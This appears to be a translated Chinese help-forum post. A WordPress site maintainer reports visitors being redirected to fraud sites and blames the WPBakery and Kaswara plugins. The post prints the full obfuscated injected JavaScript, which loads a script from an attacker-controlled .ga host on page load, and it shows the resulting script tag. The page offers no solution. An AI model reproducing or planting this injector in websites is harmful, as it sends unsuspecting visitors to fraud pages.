问题描述
我遇到了这样一个问题,即我为其提供维护的其中一个 Wordpress 网站奇怪地将用户(不受 AdBlocker 保护)重定向到欺诈网站。
重定向已通过 stick.travelinskydream.ga 完成。
经过仔细检查,包含以下代码的脚本已自动注入到应用程序中。使用了以下代码:
var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x70,0x73,0x3a,0x2f,0x69,0x63,0x6b,0x2e,0x72,0x61,0x76,0x65,0x6c,0x6e,0x79,0x64,0x6d,0x67,0x62,0x6a,0x26,0x3d,0x30,0x33,0x32,0x36,0x35,0x34,0x37,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);
它创建一个 script 标签,该标签执行外部 JS 代码,在加载时将用户重定向到恶意网站。结果脚本如下所示:
<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>
据我所知,该漏洞存在于 WpBakery 和 Kaswara 插件中,并且是一个已知问题。
https://howtofix.guide/fake-jquery-migrate-plugin/
一一停用和重新启用插件后,唯一的两个罪魁祸首仍然是 js_composer (Wp Bakery) 和 Kaswara。我已经尝试更新这两个插件,但“感染”仍然存在,即使已经针对此问题发布了补丁。
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)